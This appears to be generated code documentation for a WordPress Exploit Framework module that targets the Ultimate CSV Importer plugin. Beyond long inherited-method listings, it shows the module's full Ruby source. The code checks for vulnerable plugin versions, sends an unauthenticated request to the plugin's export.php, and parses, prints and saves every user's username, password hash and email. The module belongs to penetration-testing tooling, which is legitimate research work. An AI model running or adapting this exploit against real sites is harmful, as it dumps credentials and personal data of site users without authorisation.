Class: Wpxf::Auxiliary::UltimateCsvImporterUserExtract

Inherits:
Module
  • Object
show all
Includes:
Wpxf, Net::HttpClient
Defined in:
lib/wpxf/modules/auxiliary/hash_dump/ultimate_csv_importer_user_extract.rb

Constant Summary

Constants included from Net::HttpOptions

Net::HttpOptions::HTTP_OPTION_BASIC_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_CLIENT_TIMEOUT, Net::HttpOptions::HTTP_OPTION_FOLLOW_REDIRECT, Net::HttpOptions::HTTP_OPTION_HOST, Net::HttpOptions::HTTP_OPTION_HOST_VERIFICATION, Net::HttpOptions::HTTP_OPTION_MAX_CONCURRENCY, Net::HttpOptions::HTTP_OPTION_PEER_VERIFICATION, Net::HttpOptions::HTTP_OPTION_PORT, Net::HttpOptions::HTTP_OPTION_PROXY, Net::HttpOptions::HTTP_OPTION_PROXY_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_SSL, Net::HttpOptions::HTTP_OPTION_TARGET_URI, Net::HttpOptions::HTTP_OPTION_USER_AGENT, Net::HttpOptions::HTTP_OPTION_VHOST

Constants included from WordPress::Options

WordPress::Options::WP_OPTION_CONTENT_DIR

Instance Attribute Summary

Attributes inherited from Module

#active_workspace, #event_emitter, #payload, #session_cookie

Attributes included from Options

#datastore, #options

Instance Method Summary collapse

Methods included from Net::HttpClient

#base_http_headers, #base_uri, #download_file, #execute_delete_request, #execute_get_request, #execute_post_request, #execute_put_request, #execute_queued_requests, #execute_request, #full_uri, #initialize_advanced_options, #initialize_options, #max_http_concurrency, #normalize_relative_uri, #normalize_uri, #queue_request, #target_host, #target_port, #target_uri

Methods included from Net::TyphoeusHelper

#advanced_typhoeus_options, #create_typhoeus_request, #create_typhoeus_request_options, #standard_typhoeus_options

Methods included from Net::UserAgent

#clients_by_frequency, #random_browser_and_os, #random_chrome_platform_string, #random_firefox_platform_string, #random_firefox_version_string, #random_iexplorer_platform_string, #random_opera_platform_string, #random_processor_string, #random_safari_platform_string, #random_time_string, #random_user_agent

Methods included from Versioning::OSVersions

#random_nt_version, #random_osx_version

Methods included from Versioning::BrowserVersions

#random_chrome_build_number, #random_chrome_version, #random_ie_version, #random_opera_version, #random_presto_version, #random_presto_version2, #random_safari_build_number, #random_safari_version, #random_trident_version

Methods included from Wpxf

app_path, build_module_list, change_stdout_sync, custom_modules_path, data_directory, databases_path, gemspec, home_directory, load_custom_modules, load_module, modules_path, payloads_path, version

Methods inherited from Module

#aux_module?, #can_execute?, #check_wordpress_and_online, #cleanup, #exploit_module?, #missing_options, #set_option_value, #unset_option

Methods included from Db::Credentials

#store_credentials

Methods included from ModuleAuthentication

#authenticate_with_wordpress, #requires_authentication

Methods included from WordPress::Urls

#wordpress_url_admin, #wordpress_url_admin_ajax, #wordpress_url_admin_options, #wordpress_url_admin_post, #wordpress_url_admin_profile, #wordpress_url_admin_update, #wordpress_url_atom, #wordpress_url_author, #wordpress_url_comments_post, #wordpress_url_login, #wordpress_url_new_user, #wordpress_url_opml, #wordpress_url_plugin_install, #wordpress_url_plugin_upload, #wordpress_url_plugins, #wordpress_url_post, #wordpress_url_rdf, #wordpress_url_readme, #wordpress_url_rest_api, #wordpress_url_rss, #wordpress_url_sitemap, #wordpress_url_themes, #wordpress_url_uploads, #wordpress_url_wp_content, #wordpress_url_xmlrpc

Methods included from WordPress::Options

#wp_content_dir

Methods included from WordPress::Login

#valid_wordpress_cookie?, #wordpress_login, #wordpress_login_post_body

Methods included from WordPress::Fingerprint

#check_plugin_version_from_changelog, #check_plugin_version_from_readme, #check_theme_version_from_readme, #check_theme_version_from_style, #check_version_from_custom_file, #wordpress_and_online?, #wordpress_version

Methods included from Options

#all_options_valid?, #get_option, #get_option_value, #missing_options, #normalized_option_value, #option_valid?, #option_value?, #register_advanced_options, #register_evasion_options, #register_option, #register_options, #scoped_option_change, #set_option_value, #unregister_option, #unset_option

Methods included from OutputEmitters

#emit_error, #emit_info, #emit_success, #emit_table, #emit_warning

Methods included from ModuleInfo

#emit_usage_info, #module_author, #module_date, #module_desc, #module_description_preformatted, #module_name, #module_references, #update_info

Constructor Details

#initializeUltimateCsvImporterUserExtract

Returns a new instance of UltimateCsvImporterUserExtract.



9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
 
# File 'lib/wpxf/modules/auxiliary/hash_dump/ultimate_csv_importer_user_extract.rb', line 9

def initialize
  super

  update_info(
    name: 'Ultimate CSV Importer User Table Extract',
    desc: %(
      Due to lack of verification of a visitor's permissions, it is
      possible to execute the 'export.php' script included in the
      default installation of the Ultimate CSV Importer plugin and
      retrieve the full contents of the user table in the WordPress
      installation. This results in full disclosure of usernames,
      hashed passwords and email addresses for all users.
    ),
    author: [
      'James Hooker', # Disclosure
      'rastating'     # WPXF module
    ],
    references: [
      ['WPVDB', '7778']
    ],
    date: 'Feb 02 2015'
  )

  register_options([
    StringOption.new(
      name: 'export_path',
      desc: 'The file to save the export to',
      required: false
    )
  ])
end

Instance Method Details

#checkObject 



41
42
43
 
# File 'lib/wpxf/modules/auxiliary/hash_dump/ultimate_csv_importer_user_extract.rb', line 41

def check
  check_plugin_version_from_readme('wp-ultimate-csv-importer', '3.6.7', '3.6.0')
end

#export_pathObject 



45
46
47
48
 
# File 'lib/wpxf/modules/auxiliary/hash_dump/ultimate_csv_importer_user_extract.rb', line 45

def export_path
  return nil if normalized_option_value('export_path').nil?
  File.expand_path normalized_option_value('export_path')
end

#exporter_urlObject 



54
55
56
 
# File 'lib/wpxf/modules/auxiliary/hash_dump/ultimate_csv_importer_user_extract.rb', line 54

def exporter_url
  normalize_uri(plugin_url, 'modules', 'export', 'templates', 'export.php')
end

#parse_csv(body, delimiter) ⇒ Object 



77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
 
# File 'lib/wpxf/modules/auxiliary/hash_dump/ultimate_csv_importer_user_extract.rb', line 77

def parse_csv(body, delimiter)
  begin
    CSV::Converters[:blank_to_nil] = lambda do |field|
      field && field.empty? ? nil : field
    end
    csv = CSV.new(
      body,
      :col_sep => delimiter,
      :headers => true,
      :header_converters => :symbol,
      :converters => [:all, :blank_to_nil]
    )
    csv.to_a.map { |row| process_row(row) }
    return true
  rescue
    return false
  end
end

#payload_bodyObject 



58
59
60
61
62
63
64
 
# File 'lib/wpxf/modules/auxiliary/hash_dump/ultimate_csv_importer_user_extract.rb', line 58

def payload_body
  builder = Utility::BodyBuilder.new
  builder.add_field('export', 'users')
  builder.create do |body|
    return body
  end
end

#plugin_urlObject 



50
51
52
 
# File 'lib/wpxf/modules/auxiliary/hash_dump/ultimate_csv_importer_user_extract.rb', line 50

def plugin_url
  normalize_uri(wordpress_url_plugins, 'wp-ultimate-csv-importer')
end

#process_row(row) ⇒ Object 



66
67
68
69
70
71
72
73
74
75
 
# File 'lib/wpxf/modules/auxiliary/hash_dump/ultimate_csv_importer_user_extract.rb', line 66

def process_row(row)
  if row[:user_login] && row[:user_pass]
    emit_success "Found credential: #{row[:user_login]}:#{row[:user_pass]}", true
    @credentials.push({
        username: row[:user_login],
        password: row[:user_pass],
        email: row[:user_email]
    })
  end
end

#runObject 



96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
 
# File 'lib/wpxf/modules/auxiliary/hash_dump/ultimate_csv_importer_user_extract.rb', line 96

def run
  return false unless super

  @credentials = [{
    username: 'Username', password: 'Password Hash', email: 'E-mail'
  }]

  emit_info 'Requesting CSV extract...'
  res = execute_post_request(url: exporter_url, body: payload_body)

  if res.nil?
    emit_error 'No response from the target'
    return false
  end

  if res.code != 200
    emit_error "Server responded with code #{res.code}"
    return false
  end

  emit_info 'Parsing response...'
  unless parse_csv(res.body, ',') || parse_csv(res.body, ';')
    emit_error 'Failed to parse response, the CSV was invalid'
    emit_info "CSV content: #{res.body}", true
    return false
  end

  emit_table @credentials

  if export_path
    emit_info 'Saving export...'
    File.open(export_path, 'w') { |file| file.write(res.body) }
    emit_success "Saved export to #{export_path}"
  end

  true
end